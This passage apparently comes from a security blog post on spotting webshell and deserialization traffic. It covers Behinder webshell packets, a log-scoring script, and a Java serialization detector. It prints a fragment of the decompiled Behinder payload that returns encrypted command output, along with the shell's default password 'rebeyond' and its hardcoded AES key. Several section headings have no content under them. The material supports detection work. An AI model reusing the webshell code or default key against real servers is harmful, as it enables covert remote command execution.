            write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8"))); // encrypt the execution result and write it back
            so.getClass().getMethod("flush").invoke(so);
            so.getClass().getMethod("close").invoke(so);
        } catch (Exception var17) {
        }
        return true;
    }
    try {
        so = this.Response.getClass().getMethod("getOutputStream").invoke(this.Response);
        write = so.getClass().getMethod("write", byte[].class);
        write.invoke(so, this.Encrypt(this.buildJson(result, true).getBytes("UTF-8")));
        so.getClass().getMethod("flush").invoke(so);
        so.getClass().getMethod("close").invoke(so);
    } catch (Exception var18) {
    }
    return true;
}
How does the session mentioned above come into play? As shown in the figure below (image not preserved),
the shell stores the key in the session:
String k = "e45e329feb5d925b"; /* first 16 characters of the 32-character MD5 of the connection password; default password is rebeyond */ session.putValue("u", k);
Decrypting the second packet the same way shows that it collects environment information about the target (environment variables and so on).
Knowledge point: in the Behinder source this corresponds to net.rebeyond.behinder.payload.java.BasicInfo
Command execution: ipconfig
Decrypting it with the same steps reveals a class slightly different from the first aaa.class: after receiving the data it checks whether the environment is Windows or Linux, runs the command accordingly, and returns the result.
Knowledge point: in the Behinder source this corresponds to the net.rebeyond.behinder.payload.java.Cmd module
Finally the result is again encrypted and returned.
Traffic summary
Behavioural features:
1. By default Behinder automatically sends a request every 6 minutes
2. Unlike Chopper and AntSword, Behinder's first connection is two consecutive requests: the Echo connectivity check, immediately followed by the BasicInfo environment query (this 3.x shell uses a fixed key, so no key negotiation takes place); two back-to-back requests like this can be used as a feature
3. Within that short window the two request bodies differ considerably in size, which is another usable feature
4. With the JSP shell the Content-Type is always application/octet-stream, which is also a usable feature
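As an added example (not Behinder's code and not from the original post), the following Python derives the shell's AES key from a connection password the way the shell comment describes, and scores the four behavioural features above over a constructed access log: octet-stream POSTs to a .jsp, bodies that are nothing but base64, a back-to-back pair of very different sizes with a session cookie issued on the first, and later requests spaced about 6 minutes apart. The log entries, client addresses and request sizes are constructed; only the first 100 characters of the body are taken from the capture above.

```python
import hashlib
import re
from datetime import datetime, timedelta

OCTET = "application/octet-stream"
# First 100 characters of the request body captured above, used only as an "opaque blob" sample.
BLOB = "UdpdzPiwMfQSLKKtRSD8CkZXdpB38xA7sY23E7YQTWrmw8Yjl9T78BEsNzXN9AWwn/l7pp9i0+1/SQALdR2AcFtnpJWjbzQdZ5eN"


def behinder_key(password: str) -> str:
    """The AES-128 key a Behinder 3 shell hardcodes: first 16 hex chars of md5(password)."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[:16]


def is_opaque_body(body_head: str) -> bool:
    """True when the body is nothing but base64 text (no form fields, no PHP, no JSON)."""
    s = body_head.strip()
    return len(s) >= 64 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) is not None


def _req(time, src, path, ct, length, set_cookie, body_head=BLOB):
    return {"time": time, "src": src, "method": "POST", "path": path, "content_type": ct,
            "length": length, "set_cookie": set_cookie, "body_head": body_head}


# Constructed access log; timestamps and sizes are modelled on the capture above, not copied from a real log.
SAMPLE_LOG = [
    _req("2022-06-12 07:27:48", "10.0.0.5", "/web_demo/shell.jsp", OCTET, 10712, True),   # Echo check, JSESSIONID issued
    _req("2022-06-12 07:27:49", "10.0.0.5", "/web_demo/shell.jsp", OCTET, 4320, False),   # BasicInfo, much smaller
    _req("2022-06-12 07:33:49", "10.0.0.5", "/web_demo/shell.jsp", OCTET, 4320, False),   # periodic requests afterwards
    _req("2022-06-12 07:39:50", "10.0.0.5", "/web_demo/shell.jsp", OCTET, 4320, False),
    _req("2022-06-12 07:45:49", "10.0.0.5", "/web_demo/shell.jsp", OCTET, 4320, False),
    _req("2022-06-12 07:28:03", "10.0.0.9", "/web_demo/login.jsp", "application/x-www-form-urlencoded",
         23, True, "user=alice&pass=hunter2"),                                            # ordinary form login
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def flag_behinder_sessions(log, period=timedelta(minutes=6), tolerance=timedelta(seconds=15)):
    """Group POSTs by (client, path) and score the Behinder traits; keep sessions with at least two."""
    groups = {}
    for r in log:
        groups.setdefault((r["src"], r["path"]), []).append(r)
    findings = {}
    for key, reqs in groups.items():
        reqs = sorted(reqs, key=lambda r: _ts(r["time"]))
        traits = {
            "octet_stream_jsp": key[1].endswith(".jsp")
                and all(r["method"] == "POST" and r["content_type"] == OCTET for r in reqs),
            "opaque_bodies": all(is_opaque_body(r["body_head"]) for r in reqs),
            "handshake_pair": None,
            "beacon_intervals": 0,
        }
        if len(reqs) >= 2:
            a, b = reqs[0], reqs[1]
            gap = _ts(b["time"]) - _ts(a["time"])
            big = max(a["length"], b["length"])
            small = max(1, min(a["length"], b["length"]))
            # two back-to-back requests of very different size, session cookie issued on the first
            if gap <= timedelta(seconds=5) and big / small >= 2 and a["set_cookie"]:
                traits["handshake_pair"] = (a["length"], b["length"], int(gap.total_seconds()))
        gaps = [_ts(y["time"]) - _ts(x["time"]) for x, y in zip(reqs[1:], reqs[2:])]
        traits["beacon_intervals"] = sum(1 for g in gaps if abs(g - period) <= tolerance)
        if sum(1 for v in traits.values() if v) >= 2:
            findings[key] = traits
    return findings


if __name__ == "__main__":
    print(behinder_key("rebeyond"))
    for session, traits in flag_behinder_sessions(SAMPLE_LOG).items():
        print(session, traits)
```

The key derivation is what makes captured Behinder 3 traffic decryptable after the fact: with the shell file (or a guessed password) in hand, md5 of the password gives the AES key, and the Java snippet above does the rest. The session scorer deliberately requires two independent traits so that a single octet-stream upload endpoint does not fire on its own.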
Godzilla (哥斯拉) traffic characteristics
Extension: modified Godzilla
Reference article: https://xz.aliyun.com/t/11368
Cobalt Strike (CS) traffic characteristics
Burp Suite traffic characteristics
Reference article: https://juejin.cn/post/7122364903372881950
msf (Metasploit) traffic characteristics
Traffic characteristics of Java deserialization
When transported base64-encoded, as shown in the figure below (image not preserved), the data begins with the string rO0AB (the base64 of the stream magic AC ED 00 05; a serialized object continues with TC_OBJECT and TC_CLASSDESC, giving rO0ABXNy)
When transported as a hex byte stream, the data visibly begins with ac ed 00 05 (magic 0xACED, stream version 5), which can be used as the feature for recognising serialized data
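As an added example (not from the original post), the following Python recognises a Java serialization stream in all three transport forms mentioned above (raw bytes, hex text, base64 text) and reads the first class name out of the stream header, which is the first thing an analyst wants when triaging a suspected gadget chain. The sample stream and the class name org.example.Payload are constructed; only the magic, version and type-code constants come from the Java Object Serialization Stream Protocol.

```python
import base64
import binascii
import re
import struct

JAVA_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC 0xACED, STREAM_VERSION 5
TC_OBJECT, TC_CLASSDESC = b"\x73", b"\x72"


def build_sample_stream(class_name: str) -> bytes:
    """Constructed head of a serialized object: magic, version, TC_OBJECT, TC_CLASSDESC,
    class name (2-byte length + modified UTF-8), serialVersionUID, flags, field count."""
    name = class_name.encode("utf-8")
    return (JAVA_MAGIC + TC_OBJECT + TC_CLASSDESC + struct.pack(">H", len(name)) + name
            + b"\x00" * 8 + b"\x02" + b"\x00\x00")


def encode_for_transport(stream: bytes, encoding: str) -> bytes:
    """Produce the wire form an attacker would send (used here to build sample input)."""
    if encoding == "base64":
        return base64.b64encode(stream)
    if encoding == "hex":
        return stream.hex().encode("ascii")
    return stream


def find_java_serialization(data: bytes):
    """Detect a serialization stream sent raw, hex-encoded or base64-encoded.
    Returns {"encoding": ..., "stream": bytes} or None."""
    if data.startswith(JAVA_MAGIC):
        return {"encoding": "raw", "stream": data}
    text = data.strip()
    if re.fullmatch(rb"(?:[0-9a-fA-F]{2})+", text) and text[:8].lower() == b"aced0005":
        return {"encoding": "hex", "stream": bytes.fromhex(text.decode("ascii"))}
    # base64 of AC ED 00 05 is "rO0ABQ"; with TC_OBJECT/TC_CLASSDESC following it is "rO0ABXNy".
    # The prefix only holds when the stream starts at the beginning of the base64 text.
    if text.startswith(b"rO0AB"):
        try:
            return {"encoding": "base64", "stream": base64.b64decode(text, validate=True)}
        except binascii.Error:
            return None
    return None


def first_class_name(stream: bytes):
    """Name of the first class in the stream (the entry point of a gadget chain), or None."""
    if len(stream) < 8 or not stream.startswith(JAVA_MAGIC):
        return None
    if stream[4:6] != TC_OBJECT + TC_CLASSDESC:
        return None
    (n,) = struct.unpack(">H", stream[6:8])
    return stream[8:8 + n].decode("utf-8", "replace")


if __name__ == "__main__":
    s = build_sample_stream("org.example.Payload")
    for enc in ("raw", "hex", "base64"):
        hit = find_java_serialization(encode_for_transport(s, enc))
        print(enc, hit["encoding"], first_class_name(hit["stream"]))
```

The class-name step is cheap and pays off: a stream whose first class descriptor names something like a HashMap or a PriorityQueue from a known gadget chain is far more interesting than one whose first class is the application's own DTO, and the header parse needs no Java runtime.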